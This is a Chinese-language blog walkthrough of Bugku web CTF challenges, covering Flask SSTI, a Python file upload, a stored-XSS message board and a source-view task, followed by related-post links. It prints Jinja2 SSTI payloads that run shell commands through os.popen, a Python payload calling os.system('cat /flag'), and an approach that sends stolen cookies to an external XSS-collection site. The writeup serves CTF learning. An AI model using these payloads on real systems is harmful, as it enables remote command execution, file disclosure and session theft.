[Bugku] web-CTF靶场详解!!!

于 2024-07-30 20:29:32 发布
阅读量486 收藏 3
点赞数 17
文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/muyuchen110/article/details/140803652
版权

            平台为“山东安信安全技术有限公司”自研CTF/AWD一体化平台,部分赛题采用动态FLAG形式,避免直接抄袭答案。

           平台有题库、赛事预告、工具库、Writeup库等模块。

-------------------------------

Simple_SSTI_1

                         启动环境:

               

              页面提示传入参数flag 

 

           F12查看源码得到第二个提示

      SECRET_KEY(秘钥)是Flask中重要的一个配置值,在这题,构造语句查看它,得到flag

      SECRET_KEY(秘钥)是Flask中重要的一个配置值,在这题,构造语句查看它,得到flag

-------------------------------------------------

Simple_SSTI_2

                         启动环境:

   页面提示传入参数flag 

             f12查看源码,发现没有提示信息。

            

           通过{{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}读取系统文件(读取网站系统目录),发现如下的文件夹:

           通过{{ config.__class__.__init__.__globals__['os'].popen('ls ../app').read() }}读取读取app目录下的文件,发现存在flag文件 

            通过{{ config.__class__.__init__.__globals__['os'].popen('cat ../app/flag').read() }}读取flag内容,读取flag内容,最终得到flag 

 

----------------------------------------

Flask_FileUpload

                                启动环境:

           发现是上传文件

        随便找张图片上传试试 

     查看源代码f12进入    注释告诉我们,会运行python的文件

     根据需求,编写代码  写一个python代码改成jpg或者png格式的文件

import os
os.system('cat /flag')

 

  上传 看看     在元素中即可查看flag

 

----------------------------------------

留言板:

              开启环境:

提示需登录后台,需要使用python平台接收flag

打开场景后,出现了下面的界面。

  • 看到此类的题目,应该和存储型xss有关,也就是将恶意代码保存到服务器端
  • 即然在服务器端,那就是会在后台弹出窗口了
  • 所以需要找到后台地址,看看能不能爆破进入,但是题目提示了说不需要登录后台,需要使用xss平台来接收cookies
  • 测试一下script代码:

          发现确实可以读取到。

         使用目录扫描工具-御剑进行扫描试试

        得到后台管理地址:/admin.php 

          账号密码不知道?
          需要注意的是:该题目提示了无需登录后台!需要xss平台接收flag, http协议需要http协议的xss平台
           所以,我们需要找一个xss平台(https://xssaq.com/),目前我找到的这个是免费可用的,其他的都需要付费。

           将项目中提供的代码输入留言板中:

 在查看扫描出来的db.sql(本人没扫出来)不知道他们怎么扫出来的

# Host: localhost  (Version: 5.5.53)
# Date: 2019-08-04 16:13:22
# Generator: MySQL-Front 5.3  (Build 4.234)
 
/*!40101 SET NAMES utf8 */;
 
#
# Structure for table "text"
#
 
CREATE DATABASE xss DEFAULT CHARACTER SET utf8;
use xss; 
 
DROP TABLE IF EXISTS `text`;
CREATE TABLE `text` (
  `Id` int(11) NOT NULL AUTO_INCREMENT,
  `text` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`Id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
 
#
# Data for table "text"
#
 
/*!40000 ALTER TABLE `text` DISABLE KEYS */;
/*!40000 ALTER TABLE `text` ENABLE KEYS */;
 
#
# Structure for table "user"
#
 
DROP TABLE IF EXISTS `user`;
CREATE TABLE `user` (
  `Id` int(11) NOT NULL AUTO_INCREMENT,
  `username` varchar(255) DEFAULT NULL,
  `password` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`Id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
 
#
# Data for table "user"
#
 
/*!40000 ALTER TABLE `user` DISABLE KEYS */;
INSERT INTO `user` VALUES (1,'admin','011be4d65feac1a8');
/*!40000 ALTER TABLE `user` ENABLE KEYS */;

  

           底部存在一组 user passwd

 

         尝试解码登录

      反射我们刚刚xss语句,我们在回到xss平台获得信息

       查看获得cookie,flag加密信息,解码获得flag

-------------------------------------------

滑稽:

                    开启环境:

                打开为以下界面

           查看源代码 获得flag

muyuchen110
关注
  • 17
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
CTF-6#SYSTEM!POWER!-WP
10-23
CTF WP SYSTEM!POWER! CTF(Capture The Flag)竞赛题目6#SYSTEM!POWER!的WP(Write-up)解析。 CTF WP CTF竞赛是信息安全领域中的一种比赛形式,旨在评估参与者的安全技能。WP是Write-up的缩写,指的是CTF...
CTF-5#进击!拿到Web最高权限-WP
10-23
CTF/Web安全/ WP最高权限获取 CTF(Capture The Flag)是一种信息安全竞赛形式,目的是为了让参与者通过解决各种挑战和谜题来获取 Flags,证明自己的信息安全能力。WP(Web)是CTF中的一种挑战形式,旨在让参与者...
apachecn#apachecn-ctf-wiki#BugkuCTF-WEB解题记录-11-15_weixin_3069946
07-25
BugkuCTF WEB解题记录 11-15_weixin_30699463的博客-CSDN博客来源:
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
Web-CTF-Cheatsheet:Web CTF速查表:cat:
04-29
WEB CTF备忘单 目录 MySQL 微软SQL Oracle SQLite的 PostgreSQL MS Access LFI 上载 序列化 PHP序列化 Python泡菜 Ruby元帅 Ruby YAML Java序列化 .NET序列化 SSTI / CSTI Flask / Jinja2 嫩枝/ Symfony ...
ASP.NET Web Api 使用 EF 6,DateTime 字段如何取数据库服务器当前时间
yangshuquan的专栏
07-24 825
在做数据库设计时,为了方便进行数据追踪,通常会有几个字段是每个表都有的,比如创建时间、创建人、更新时间、更新人等,这些时间字段一般存储的是数据库服务器的时间,EF 是操作整个数据表对象,所以需要寻找方法来实现这个目的。本文分享 DB First 和 Code First 两种模式的 EF 中 DateTime 字段如何存储数据库服务器当前时间的方法。
Windows10+vs 2017中创建WEB API教程
Explinks的博客
07-24 1026
本文将介绍如何在Windows10+vs 2017中创建web Api的教程。目前本教程当中的方法在Win10 + VS2017(MVC5)win server2016+vs2017,vs2013 vs2019当中测试通过。
Hutool SoapClient 调用使用@webservice 发布的webService接口,参数传递为空
FangX_u的博客
07-24 606
采用工具类Hutool SoapClient调用@webservice 发布的webService接口时,参数传递不到webService,可以借助SoapUI工具辅助查看。
TS如何处理js模块的类型?
闻人放歌的三寸青草园圃
07-24 285
【代码】TS如何处理js模块的类型?
苍穹外卖浏览器前端界面修改
程序员象漂亮的博客
07-25 241
客户原始方案是期望做一个Spring Boot + Vue的饿了么系统,但时间上太仓促,所以建议选择开源的苍穹外码目作为作业提交。客户接受了建议的方案后,期望对前端页面提出了一些个性化的定制修改。
electron 主进程和渲染进程
qq_21087199的博客
07-29 215
虽然最近一年前端大环境不好,但是大家还是要加油鸭!,努力总不会错,千军万马过独木桥,希望大家都是闯过去那一个。进入正题。
基于上云api前端开发经验教训(loading...)
IIIIIAN
07-26 411
对于上云api开发学习过程中的错误教训积累总结
前端 axios 封装
最新发布
清云
07-29 330
前端 axios 封装
我们的前端开发逆天了!1 小时搞定了新网站,还跟我说 “不要钱”
努力做最接地气的编程干货分享,感谢关注
07-29 668
本文将带你了解一个新的 Web 框架 **Astro**,并手把手带你使用 Astro 搭建一个属于自己的站点,用过的都说真香!
前端学习1——自学习梳理
qq_63125992的博客
07-24 392
【代码】前端学习1——自学习梳理。
Vue3扁平化Tree组件的前端分页实现
felix_alone2012的博客
07-24 389
大家好,我是小卷。得益于JuanTree的扁平化设计,在数据量很大的情况下除了懒加载,使用前端分页也是一种解决渲染性能问题的可选方案。
前端开发技术之HTML/CSS
m0_67484548的博客
07-29 524
5. <figure> 和 <figcaption>:<figure> 用于媒体内容的分组,<figcaption> 用于定义 <figure>1. <menu> 和 <menuitem>:定义菜单列表(<menu>)和菜单项(<menuitem>)(HTML5。1. <h1> to <h6>:定义HTML标题,<h1> 表示最高的标题级别,<h6> 表示最低的标题级别。3. <figure> 和 <figcaption>:定义媒体内容的分组,以及媒体的标题或说明。
前端必修技能:高手进阶核心知识分享 - css盒的before、after和子元素的层叠关系解析及应用
uu0216的博客
07-29 691
一个盒子 它的 ::before伪类在最底层, ::after 伪元素在最上层, 其所有子元素在中间叠放。 盒子的 子元素堆叠关系,按照书写顺序自下而上排序:先写的叠放在下面,后写的在上面。 父元素在最下面。
技术实践—微前端技术应用
iOceanMind的博客
07-26 536
微前端是一种新兴的前端架构模式,是一种类似于微服务的架构,将微服务的理念应用于浏览器端。其核心理念是将一个大而单一的前端应用拆分为多个小型独立的微应用。这些微应用各自独立,可以由不同团队开发维护,部署,组合这些微应用,行成一个聚合应用。
bugku ctf sqli-0x1题解
03-23
bugku ctf是一个CTF(Capture The Flag)比赛平台,提供各种类型的安全挑战题目供参赛者解答。sqli-0x1是其中一个SQL注入题目,下面是该题目的解题思路: 1. 题目描述:sqli-0x1是一个简单的SQL注入题目,要求获取数据库中的某个表的内容。 2. 分析注入点:首先,我们需要找到注入点。可以通过在输入框中输入一些特殊字符(如'、"、;等)来尝试触发SQL注入。如果页面返回异常或者显示不正常,那么很可能存在注入点。 3. 判断注入类型:确定注入点后,我们需要判断注入类型。可以通过在输入框中输入一些测试语句(如' or 1=1--)来判断是否存在注入漏洞。如果页面返回正常,那么很可能存在注入漏洞。 4. 获取数据库信息:一旦确认存在注入漏洞,我们可以通过构造合适的SQL语句来获取数据库信息。可以使用UNION SELECT语句来获取表的列数和列名,然后使用SELECT语句获取表的内容。 5. 构造SQL语句:根据题目要求,我们需要获取某个表的内容。可以使用如下语句来获取表的内容: SELECT column_name FROM information_schema.columns WHERE table_name='表名'; SELECT * FROM 表名; 6. 获取结果:根据构造的SQL语句,将其作为输入发送给服务器,获取返回的结果。根据返回的结果,我们可以得到表的列数、列名和表的内容。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值